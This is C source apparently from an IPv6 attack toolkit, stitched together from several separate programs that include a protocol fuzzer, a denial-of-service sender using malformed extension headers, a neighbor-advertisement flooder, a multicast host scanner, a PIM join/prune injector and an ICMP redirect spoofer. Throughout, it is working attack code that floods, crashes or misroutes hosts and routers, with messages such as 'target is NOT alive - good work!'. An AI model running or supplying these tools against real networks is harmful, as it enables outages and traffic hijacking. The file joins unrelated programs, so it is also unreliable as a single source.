hdr = (thc_ipv6_hdr *) pkt;
if (jumbo) {
i = 0;
j = 1;
while (i < hdr->pkt_len + 4 && j) {
if (hdr->pkt[i] == 'J')
if (memcmp(&hdr->pkt[i], "JJJJ", 4) == 0)
j = 0;
i++;
}
if (j) {
fprintf(stderr, "ERROR: fuckup, cant find my own marker?!\n");
exit(-1);
} else
i--;
hdr->pkt[i] = 0;
hdr->pkt[i + 1] = 0;
hdr->pkt[i + 2] = hdr->pkt[4 + off2];
hdr->pkt[i + 3] = hdr->pkt[5 + off2];
hdr->pkt[4 + off2] = 0;
hdr->pkt[5 + off2] = 0;
}
if (extend)
for (i = 0; i < strlen(fuzzbuf); i++)
if (fuzzbuf[i] == 'B' || fuzzbuf[i] == 'F')
fuzzbuf[i] = 'X';
// backup of generated packet
pkt_bak = malloc(hdr->pkt_len);
memcpy(pkt_bak, hdr->pkt, hdr->pkt_len);
printf("Fuzzing packet, starting at fuzz case %d, ending at fuzz case %d, every packet sent denoted by a dot:\n", test_start, test_end);
//printf("buf(%d): %s\n", strlen(fuzzbuf), fuzzbuf);
while (do_fuzz) {
if (test_cnt == 0)
while (fuzzbuf[test_ptr] == '.') {
test_ptr++;
test_pos++;
}
if (fuzzbuf[test_ptr] == 0)
do_fuzz = 0;
test_cnt++;
do_it = 1;
//printf("[%s] pos[%d]=%c -> %d | pkt[%d] | %d (%d=>%d)| ", /*fuzzbuf*/"", test_ptr, fuzzbuf[test_ptr], test_cnt, test_pos, test_current, test_start, test_end);
switch (fuzzbuf[test_ptr]) {
case 0:
break;
case 'X':
if (test_cnt <= COUNT_EXTEND) {
if (pkt_bak[test_pos] != extends[test_cnt - 1])
hdr->pkt[test_pos] = extends[test_cnt - 1];
else
do_it = 0;
} else {
test_cnt = 0;
test_ptr++;
test_pos++;
}
break;
case 'B':
if (test_cnt <= COUNT_BYTE) {
if (pkt_bak[test_pos] != bytes[test_cnt - 1])
hdr->pkt[test_pos] = bytes[test_cnt - 1];
else
do_it = 0;
} else {
i = 0;
while (i < COUNT_BYTE && do_it) {
if (bytes[i] == pkt_bak[test_pos])
do_it = 0;
i++;
}
if (do_it)
hdr->pkt[test_pos] = hdr->pkt[test_pos] ^ xors[test_cnt - COUNT_BYTE - 1];
}
if (test_cnt == COUNT_BYTE + COUNT_XOR) {
test_cnt = 0;
test_ptr++;
test_pos++;
}
break;
case 'F':
if (test_cnt <= COUNT_FLAG) {
if (pkt_bak[test_pos] != flags[test_cnt - 1])
hdr->pkt[test_pos] = flags[test_cnt - 1];
else
do_it = 0;
} else {
i = 0;
while (i < COUNT_FLAG && do_it) {
if (bytes[i] == pkt_bak[test_pos]) // yes, bytes[] is the right one even for flags
do_it = 0;
i++;
}
if (do_it)
hdr->pkt[test_pos] = hdr->pkt[test_pos] ^ xors[test_cnt - COUNT_BYTE - 1];
}
if (test_cnt == COUNT_FLAG + COUNT_XOR) {
test_cnt = 0;
test_ptr++;
test_pos++;
}
break;
case 'W':
sip = (unsigned short int *) &pkt_bak[test_pos];
if (test_cnt <= COUNT_WORD) {
if (*sip != words[test_cnt - 1])
memcpy((char *) &hdr->pkt[test_pos], (char *) &words[test_cnt - 1] + _TAKE2, 2);
else
do_it = 0;
} else {
i = 0;
while (i < COUNT_WORD && do_it) {
if (words[i] == *sip)
do_it = 0;
i++;
}
if (do_it) {
i = *sip ^ xors[test_cnt - COUNT_WORD - 1];
sip = (unsigned short int *) &hdr->pkt[test_pos];
*sip = i % 65536;
}
}
if (test_cnt == COUNT_WORD + COUNT_XOR) {
test_cnt = 0;
test_ptr++;
test_pos += 2;
}
break;
default:
fprintf(stderr, "This character should not be in the fuzz string, shoot the programmer: %c(%d) position %d string %s\n", fuzzbuf[test_ptr], fuzzbuf[test_ptr], test_ptr,
fuzzbuf);
exit(-1);
break;
}
if (do_it && do_fuzz) {
if (test_current >= test_start && test_current <= test_end && do_fuzz) {
// fill icmp id+seq and unique buffer with test case number
if (fragment)
memcpy(hdr->pkt + frag_offset + 58, (char *) &test_current + _TAKE4, 4);
switch (do_type) {
case DO_NONE:
// empty
break;
case DO_PING:
for (i = 0; i < 4 + 1; i++)
memcpy(hdr->pkt + offset + 58 + i * 4, (char *) &test_current + _TAKE4, 4);
break;
case DO_TCP:
memcpy(hdr->pkt + offset + 58, (char *) &test_current + _TAKE4, 4);
break;
case DO_NEIGHSOL:
case DO_NEIGHADV:
break; // do nothing for these
case DO_NODEQUERY:
memcpy(hdr->pkt + offset + 66, (char *) &test_current + _TAKE4, 4);
break;
case DO_RA:
memcpy(hdr->pkt + offset + 0x62, (char *) &test_current + _TAKE4, 4); // prefix update
memcpy(hdr->pkt + offset + 0x7e, hdr->pkt + offset + 0x5e, 16); // routing update
memcpy(hdr->pkt + 8, (char *) &test_current + _TAKE4, 4); // srcmac update
memcpy(hdr->pkt + offset + 0x72, (char *) &test_current + _TAKE4, 4); // srcmac update
memcpy(hdr->pkt + 0x10 + off2, (char *) &test_current + _TAKE4, 4); // srcip update
memcpy(hdr->original_src, hdr->pkt + 8 + off2, 16); // srcip update for checksum
break;
case DO_MLD_QUERY:
case DO_MLD_DONE:
case DO_MLD_REP:
case DO_MLD2_QUERY:
memcpy(hdr->pkt + offset + 0x4a, (char *) &test_current + _TAKE4, 4);
break;
case DO_MLD2_REPORT: //??? XXX TODO CHECK
memcpy(hdr->pkt + offset + 0x4d, (char *) &test_current + _TAKE4, 4);
memcpy(hdr->pkt + offset + 0x4d + 68, (char *) &test_current + _TAKE4, 4);
memcpy(hdr->pkt + offset + 0x4d + 136, (char *) &test_current + _TAKE4, 4);
break;
default:
fprintf(stderr, "ERROR!!!\n");
exit(-1);
}
// regenerate checksum
if (do_type != DO_TCP && do_type != DO_NONE) { // maybe for later non-icmp stuff
hdr->pkt[offset + 56] = 0;
hdr->pkt[offset + 57] = 0;
i = checksum_pseudo_header(hdr->original_src, hdr->final_dst, NXT_ICMP6, &hdr->pkt[offset + 54], hdr->pkt_len - offset - 54);
hdr->pkt[offset + 56] = i / 256;
hdr->pkt[offset + 57] = i % 256;
} else { // TCP
hdr->pkt[offset + 70] = 0;
hdr->pkt[offset + 71] = 0;
i = checksum_pseudo_header(hdr->original_src, hdr->final_dst, NXT_TCP, &hdr->pkt[offset + 54], hdr->pkt_len - offset - 54);
hdr->pkt[offset + 70] = i / 256;
hdr->pkt[offset + 71] = i % 256;
}
// send packet
for (k = 0; k < no_send; k++) {
while(thc_send_pkt(interface, pkt, &pkt_len) < 0)
usleep(1);
}
printf(".");
usleep(250);
// if ping, check ping again
if ((test_current - test_start) % ping == 0 && test_current != 0 && test_start != test_current)
if (check_alive(p, interface, srcmac, mac, src6, real_dst6) == 0) {
i = ((((test_current - test_start) / ping) - 1) * ping) + test_start + 1;
printf("\nResult: target %s crashed during fuzzing, offending test case no. could be %d to %d\n", argv[optind + 1], i < 0 ? 0 : i, test_current);
exit(1);
}
}
//else printf("NOT SENT - NOT IN TEST LIST\n");
// reset to basic packet
memcpy(hdr->pkt, pkt_bak, hdr->pkt_len);
test_current++;
}
//else printf("NOT SENT!\n");
}
printf("\n");
// ping afterwards to check if it worked
if (do_alive) {
if (check_alive(p, interface, srcmac, mac, src6, real_dst6) == 0) {
printf("Result: target %s is NOT alive via direct ping6 - good work! (position: %d)\n", argv[optind + 1], test_pos);
exit(1);
} else
printf("Result: target %s is still alive via direct ping6, better luck next time.\n", argv[optind + 1]);
}
thc_pcap_close(p);
return 0;
}
int main(int argc, char *argv[]) {
int test = 0, count = 1, tmplen;
unsigned char buf[65536], bla[1500], tests[256];
unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal;
unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6];
thc_ipv6_hdr *hdr;
int i, j, k, srcmtu, fragsize;
unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL;
int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500;
char *interface, *randptr = NULL;
thc_ipv6_hdr *ipv6;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
interface = argv[1];
if ((dst6 = thc_resolve6(argv[2])) == NULL) {
fprintf(stderr, "Error: invalid target: %s\n", argv[2]);
exit(-1);
}
//route6 = thc_resolve6("2a01::");
memcpy(ldst6, dst6, 16);
memset(ldst6 + 2, 0, 6);
ldst6[0] = 0xfe;
ldst6[1] = 0x80;
mcast6 = thc_resolve6("ff02::1");
if (argc >= 4)
test = atoi(argv[3]);
memset(null_buffer, 0, sizeof(null_buffer));
src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) {
fprintf(stderr, "Error: invalid interface: %s\n", interface);
exit(-1);
}
srcmac = thc_get_own_mac(interface);
if (rawmode == 0) {
if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) {
fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
exit(-1);
}
} else
dstmac = null_buffer;
if ((srcmtu = thc_get_mtu(interface)) <= 0) {
fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface);
exit(-1);
}
fragsize = ((srcmtu - 62) / 8) * 8;
setvbuf(stdout, NULL, _IONBF, 0);
memset(buf, 0, sizeof(buf));
memset(tests, 0, sizeof(tests));
memset(bla, 0, sizeof(bla));
if (test < 1 || test > MAX_TEST) {
printf("%s %s (c) 2014 by %s %s\n\n", argv[0], VERSION, AUTHOR, RESOURCE);
printf("Syntax: %s interface destination test-case-number\n\n", argv[0]);
printf("The following test cases are currently implemented:\n");
printf(" 1 : large hop-by-hop header with router-alert and filled with unknown options\n");
printf(" 2 : large destination header filled with unknown options\n");
printf(" 3 : hop-by-hop header with router alert option plus 180 headers\n");
printf(" 4 : hop-by-hop header with router alert option plus 178 headers + ping\n");
printf(" 5 : AH header + ping\n");
printf(" 6 : first fragments of a ping with a hop-by-hop header with router alert\n");
printf(" 7 : large hop-by-hop header filled with unknown options (no router alert)\n");
exit(0);
}
printf("Performing denial of service test case no. %d attack on %s via %s:\n", test, argv[2], argv[1]);
printf("A \".\" is shown for every 1000 packets sent, press Control-C to end...\n");
/********************** TEST CASE PREPARATION *************************/
if (test == count) { // 1432
printf("Test %d: large hop-by-hop header with router-alert and filled with unknown options.\n", count);
printf("WARNING: this attack affects all routers on the network path to the target!!\n");
sleep(3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
buf[0] = 5;
buf[1] = 2;
j = 4;
i = 1;
while (i <= 67) {
k = (i % 63) + 1;
buf[j] = k;
switch (k) {
case 38: // quickstart
buf[j + 1] = 7; // length
buf[j + 2] = 1; // request type + rate
buf[j + 3] = 60; //qs-ttl
buf[j + 4] = 8; // nonce
j += 9;
break;
case 4:
buf[j + 1] = 1;
j += 3;
break;
case 0:
case 5:
buf[j] = 1;
// fall through
default:
buf[j + 1] = 4;
j += 6;
}
// j += buf[j + 1] + 2;
i++;
}
// for (i = 1; i < 236; i++) {
// buf[i * 6 - 2] = (i % 63) + 1;
// buf[i * 6 - 1] = 4;
// }
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, j) < 0)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
}
count++;
if (test == count) { // 1432
printf("Test %d: large destination header filled with unknown options.\n", count);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
for (i = 1; i < 237; i++) {
buf[6 + i * 6] = (i % 63) + 1;
buf[5 + i * 6] = 4;
}
if (thc_add_hdr_dst(pkt, &pkt_len, buf, 1416) < 0)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
}
count++;
if (test == count) {
j = (thc_get_mtu(interface) - 48) / 8;
if (j < 150 || j > 8000) {
fprintf(stderr, "Error: invalid MTU on interface\n");
exit(-1);
}
printf("Test %d: hop-by-hop header with router alert option plus %d headers.\n", count, j);
printf("WARNING: this attack affects all routers on the network path to the target!!\n");
sleep(3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
buf[0] = 5;
buf[1] = 2;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0)
return -1;
memset(buf, 0, 2);
for (i = 0; i < j; i++)
if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) < 0)
return -1;
// thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
}
count++;
if (test == count) {
j = (thc_get_mtu(interface) - 64) / 8;
if (j < 150 || j > 8000) {
fprintf(stderr, "Error: invalid MTU on interface\n");
exit(-1);
}
printf("Test %d: hop-by-hop header with router alert option plus %d headers plus ping.\n", count, j);
printf("WARNING: this attack affects all routers on the network path to the target!!\n");
sleep(3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
buf[0] = 5;
buf[1] = 2;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0)
return -1;
memset(buf, 0, 2);
for (i = 0; i < j; i++)
if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) < 0)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
}
count++;
if (test == count) {
printf("Test %d: AH header plus ping.\n", count);
printf("WARNING: this attack affects all routers on the network path to the target!!\n");
sleep(3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_hdr_misc(pkt, &pkt_len, NXT_AH, -1, (unsigned char *) &buf, 6 + 8) < 0)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
ipv6 = (thc_ipv6_hdr *) pkt;
if (do_hdr_size != 0)
ipv6->pkt[do_hdr_size + 40 + 1] = 2;
else
ipv6->pkt[14 + 40 + 1] = 2;
}
count++;
if (test == count) {
printf("Test %d: first ping fragment with hop-by-hop and router alert.\n", count);
printf("WARNING: this attack affects all routers on the network path to the target!!\n");
sleep(3);
buf[0] = 5;
buf[1] = 2;
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0)
return -1;
if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 1, 0xfacebabe + getpid() + count))
return -1;
buf[0] = ICMP6_MLD_REPORT;
buf[1] = 0;
buf[2] = 0xb0;
buf[3] = 0x0b;
if (thc_add_data6(pkt, &pkt_len, NXT_ICMP6, buf, 14))
return -1;
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
ipv6 = (thc_ipv6_hdr *) pkt;
if (do_hdr_size != 0)
randptr = ipv6->pkt + do_hdr_size + 40 + 8 + 4;
else
randptr = ipv6->pkt + 14 + 40 + 8 + 4;
}
count++;
if (test == count) { // 1432
printf("Test %d: large hop-by-hop header with filled with unknown options (no router alert).\n", count);
printf("WARNING: this attack affects all routers on the network path to the target!!\n");
sleep(3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
j = 0;
i = 1;
while (i <= 67) {
k = (i % 63) + 1;
buf[j] = k;
switch (k) {
case 38: // quickstart
buf[j + 1] = 7; // length
buf[j + 2] = 1; // request type + rate
buf[j + 3] = 60; //qs-ttl
buf[j + 4] = 8; // nonce
j += 9;
break;
case 4:
buf[j + 1] = 1;
j += 3;
break;
case 0:
case 5:
buf[j] = 1;
// fall through
default:
buf[j + 1] = 4;
j += 6;
}
// j += buf[j + 1] + 2;
i++;
}
// for (i = 1; i < 236; i++) {
// buf[i * 6 - 2] = (i % 63) + 1;
// buf[i * 6 - 1] = 4;
// }
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, j) < 0)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
}
count++;
if (test == count) { // dummy entry
// code
fprintf(stderr, "to implement\n");
exit(-1);
}
count++;
/******************* END OF TESTCASE PREPARATION **************************/
count = 0;
while (1) {
thc_send_pkt(interface, pkt, &pkt_len);
usleep(1);
count++;
if (randptr != NULL)
memcpy(randptr, (char*)&count + _TAKE4, 4);
if (count % 1000 == 0)
printf(".");
}
return 0;
}
int main(int argc, char *argv[]) {
char *interface, mac[6] = "";
unsigned char *mac6 = mac, *ip6;
unsigned char buf[24], srcmac[8] = "", *smac = NULL;
unsigned char *dst = thc_resolve6("ff02::1"), *dstmac = thc_get_multicast_mac(dst);
int i;
unsigned char *pkt = NULL;
int pkt_len = 0, flags, rawmode = 0, count = 0, prefer = PREFER_LINK, keepmac = 0;
if (argc > 2 && strncmp(argv[1], "-k", 2) == 0) {
keepmac = 1;
if ((smac = thc_get_own_mac(argv[2])) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", argv[2]);
exit(-1);
}
argv++;
argc--;
}
if (argc > 2 && strncmp(argv[1], "-m", 2) == 0) {
sscanf(argv[2], "%x:%x:%x:%x:%x:%x", (unsigned int *) &srcmac[0], (unsigned int *) &srcmac[1], (unsigned int *) &srcmac[2], (unsigned int *) &srcmac[3],
(unsigned int *) &srcmac[4], (unsigned int *) &srcmac[5]);
smac = srcmac;
argv+=2;
argc-=2;
}
if (smac != NULL)
mac6 = smac;
if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
srand(time(NULL) + getpid());
setvbuf(stdout, NULL, _IONBF, 0);
interface = argv[1];
if (thc_get_own_mac(interface) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
if (argc == 3) {
if ((dst = thc_resolve6(argv[2])) == NULL) {
fprintf(stderr, "Error: invalid target IPv6 address\n");
exit(-1);
} else {
dstmac = thc_get_mac(interface, NULL, dst);
}
if (dst[0] >= 0x20 && dst[0] <= 0xfd)
prefer = PREFER_GLOBAL;
}
ip6 = thc_get_own_ipv6(interface, dst, prefer);
mac[0] = 0x00;
mac[1] = 0x18;
memset(ip6 + 8, 0, 8);
ip6[8] = 0x02;
ip6[9] = mac[1];
ip6[11] = 0xff;
ip6[12] = 0xfe;
memset(buf, 0, sizeof(buf));
buf[16] = 2;
buf[17] = 1;
buf[18] = mac[0];
buf[19] = mac[1];
memcpy(buf, ip6, 16);
flags = ICMP6_NEIGHBORADV_OVERRIDE;
printf("Starting to flood network with neighbor advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
while (1) {
for (i = 2; i < 6; i++)
mac[i] = rand() % 256;
// ip6[9] = mac[1];
ip6[10] = mac[2];
ip6[13] = mac[3];
ip6[14] = mac[4];
ip6[15] = mac[5];
count++;
memcpy(buf + 10, ip6 + 10, 6);
memcpy(&buf[20], mac + 2, 4);
if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, flags, buf, sizeof(buf), 0) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
// fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
// perror("");
// return -1;
printf("!");
}
pkt = thc_destroy_packet(pkt);
// usleep(1);
if (count % 1000 == 0)
printf(".");
}
return 0;
}
/**
Função principal que realiza o host scan IPv6 na rede
*/
int hostScan(int rawmode, // informa se o "raw mode" foi ativado ou nao
char *interface, // nome da interface de analise
unsigned char *multicast6, // endereco do grupo multicast de destino
unsigned char *router6, // roteador da rota parametrizada
unsigned char **routers) {
unsigned char *src6 = NULL, // endereco ip6 do host [que realiza o scan]
*mac = NULL, // endereco MAC do host [que realiza o scan]
string[64] = "ip6 and dst "; // Mascara de captura de pacotes [apenas 1pv6 e destino a ser marcado]
time_t passed; // timestamp do inicio do scan
pcap_t *p; // contexto pcap de captura
// obtendo seu proprio endereco ip6
src6 = thc_get_own_ipv6(interface, multicast6, PREFER_GLOBAL);
// se estiver operando em "raw mode" deve-se resolver seu proprio endereco MAC
if (rawmode == 0 && (mac = thc_get_mac(interface, src6, multicast6)) == NULL) {
fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", thc_ipv62string(src6));
exit(-1);
}
// setar o endereco do host para a filtragem de pacotes recebidos
strcat(string, thc_string2notation(thc_ipv62string(src6)));
// make the sending buffer unique
memset(buf, 'A', sizeof(buf)); // Preenche o buffer com o caractere 'A'
time((time_t *) & buf[2]); // coloca da 3a posicao do buffer o tempo em segundos [padrao]
buf[10] = getpid() % 256; // coloca o valor do process id ..
buf[11] = getpid() / 256; // .. nas posicoes 11 e 12 do buffer
memcpy(&buf[12], multicast6, 4); // coloca o endereco de multicast na 13a posicao do buffer
// inicializa a interface de captura de pacotes com o filtro criado
if ((p = thc_pcap_init(interface, string)) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
exit(-1);
}
// Envio do 1o pacote : Echo Request Comum
sendEchoRequest(interface, multicast6, src6, router6, routers, buf, mac, NULL);
// Envio do 2o pacote : Echo Request Com falha de Opções
sendEchoRequestOptions(interface, multicast6, src6, router6, routers, buf, mac);
// altera os dados do buffer ???
buf[0] = NXT_INVALID;
buf[1] = 1;
// Envio do 3o pacote : Echo Request Com dados Hop by Hop
sendEchoRequestHopByHop(interface, multicast6, src6, router6, routers, buf, mac);
// ???
while (thc_pcap_check(p, (char *) check_packets, NULL) > 0 && (alive_no == 0 || *multicast6 == 0xff));
// Anota o tempo de inicio
passed = time(NULL);
// enquanto nao se passam 5 segundos
while (passed + 5 >= time(NULL) && (alive_no == 0 || *multicast6 == 0xff))
thc_pcap_check(p, (char *) check_packets, NULL); // verifica os pacotes capturados
// fecha a interface de captura
thc_pcap_close(p);
// informa o numero de hosts ativos encontrados
//printf("Found %d systems alive\n", alive_no);
printf("\n");
printAliveSystems();
}
int main(int argc, char *argv[]) {
unsigned char *pkt1 = NULL, buf[100];
unsigned char *dst6 = NULL, *src6 = NULL, *multicast6, *target6, *neighbor6;
int pkt1_len = 0, i = 0;
char *interface;
int ttl = 1, mode = -1, len = 0;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
while ((i = getopt(argc, argv, "t:s:d:")) >= 0) {
switch (i) {
case 't':
ttl = atoi(optarg);
break;
case 's':
src6 = thc_resolve6(optarg);
break;
case 'd':
dst6 = thc_resolve6(optarg);
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
exit(-1);
}
}
interface = argv[optind];
if (strncasecmp(argv[optind + 1], "hello", 3) == 0)
mode = 0;
if (strncasecmp(argv[optind + 1], "join", 3) == 0)
mode = 1;
if (strncasecmp(argv[optind + 1], "prune", 3) == 0) {
mode = 2;
}
if (mode == -1) {
fprintf(stderr, "Error: no mode defined, specify hello, join or prune\n");
exit(-1);
}
if (mode != 0) {
if (argc - optind != 5) {
fprintf(stderr, "Error: join/prune mode need a multicast and target address\n");
exit(-1);
}
neighbor6 = thc_resolve6(argv[optind + 2]);
multicast6 = thc_resolve6(argv[optind + 3]);
target6 = thc_resolve6(argv[optind + 4]);
if (multicast6 == NULL || target6 == NULL || neighbor6 == NULL) {
fprintf(stderr, "Error: unable to resolve addresses\n");
exit(-1);
}
}
if (dst6 == NULL)
dst6 = thc_resolve6("ff02::d");
if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt1_len, src6, dst6, ttl, 0, 0, 0, 0)) == NULL)
return -1;
memset(buf, 0, sizeof(buf));
// here we set buf and len
switch(mode) {
case 0:
buf[1] = 1;
buf[3] = 2;
buf[5] = 255;
buf[7] = 19;
buf[9] = 4;
if (argc - optind >= 3) {
i = atoi(argv[optind + 2]);
buf[10] = i / 256*256*256;
buf[11] = (i / 65536) % 256;
buf[12] = (i % 65536) / 256;
buf[13] = i % 256;
}
len = 14;
break;
default:
buf[0] = 2;
memcpy(buf + 2, neighbor6, 16);
buf[19] = 1;
buf[21] = 255;
buf[22] = 2;
buf[25] = 128;
memcpy(buf + 26, multicast6, 16);
if (mode == 1)
buf[43] = 1;
else
buf[45] = 1;
buf[46] = 2;
buf[48] = 7;
buf[49] = 128;
memcpy(buf + 50, target6, 16);
len = 66;
mode = 3;
}
if (thc_add_pim(pkt1, &pkt1_len, mode, buf, len) < 0)
return -1;
if (thc_generate_pkt(interface, NULL, NULL, pkt1, &pkt1_len) < 0) {
fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
exit(-1);
}
while (thc_send_pkt(interface, pkt1, &pkt1_len) < 0)
usleep(5);
printf("Sent PIM %s message\n", mode == 0 ? "hello" : mode == 1 ? "join" : "prune");
return 0;
}
int main(int argc, char *argv[]) {
char string[] = "ip6 and ! src net f000::/4 and ! dst net f000::/4";
int rawmode = 0, i;
pcap_t *p;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
while ((i = getopt(argc, argv, "cr")) >= 0) {
switch (i) {
case 'r':
thc_ipv6_rawmode(1);
rawmode = 1;
offset = 0;
break;
case 'c':
loop = 1;
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
exit(-1);
}
}
if (argc - optind < 3)
help(argv[0]);
if (do_hdr_size)
offset = do_hdr_size;
interface = argv[optind];
mac6 = thc_get_own_mac(interface);
src6 = thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL);
mtu = atoi(argv[optind + 2]);
if (src6 == NULL || mac6 == NULL) {
fprintf(stderr, "Error: invalid interface or IPv6 not available: %s\n", interface);
exit(-1);
}
if (argv[optind + 1][0] == '*' || argv[optind + 1][1] == '*') {
ip6 = NULL;
} else {
ip6 = thc_resolve6(argv[optind + 1]);
if (ip6 == NULL) {
fprintf(stderr, "Error: target address is invalid: %s\n", argv[optind + 1]);
exit(-1);
}
}
if ((p = thc_pcap_init(interface, string)) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
exit(-1);
}
printf("Watching for %s from %s (Press Control-C to end) ...\n", loop == 0 ? "a packet" : "packets", argv[optind + 1]);
do {
thc_pcap_check(p, (char *) send_toobig, NULL);
usleep(25);
} while (go);
thc_pcap_close(p);
return 0;
}
int main(int argc, char *argv[]) {
unsigned char *pkt = NULL, buf[16], mac[16] = "";
unsigned char *mac6 = mac, *src6, *target6, *oldrouter6, *newrouter6, *self6, *fakemac;
thc_ipv6_hdr *ipv6;
char *interface;
int pkt_len, rawmode = 0, ttl = 64, offset = 14;
if (argc < 6 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
if (do_hdr_size)
offset = do_hdr_size;
interface = argv[1];
src6 = thc_resolve6(argv[2]);
target6 = thc_resolve6(argv[3]);
oldrouter6 = thc_resolve6(argv[4]);
if ((newrouter6 = thc_resolve6(argv[5])) == NULL) {
fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[5]);
exit(-1);
}
if (thc_get_own_mac(interface) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
/* Spoof source mac */
if ((self6 = thc_get_own_ipv6(interface, oldrouter6, PREFER_GLOBAL)) == NULL) {
fprintf(stderr, "Error: could not get own IP address to contact original-router\n");
exit(-1);
}
if ((fakemac = thc_get_mac(interface, self6, oldrouter6)) == NULL) {
fprintf(stderr, "Error: could not resolve mac address for original-router\n");
free(self6);
exit(-1);
}
if (rawmode == 0) {
if (argc >= 7)
sscanf(argv[6], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
(unsigned int *) &mac[5]);
else
mac6 = thc_get_own_mac(interface);
}
if (argc >= 8)
ttl = atoi(argv[7]);
if (ttl <= 0 || ttl > 255)
ttl = 64;
memset(buf, 'A', 16);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, target6, src6, 0, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, 16, 0) < 0)
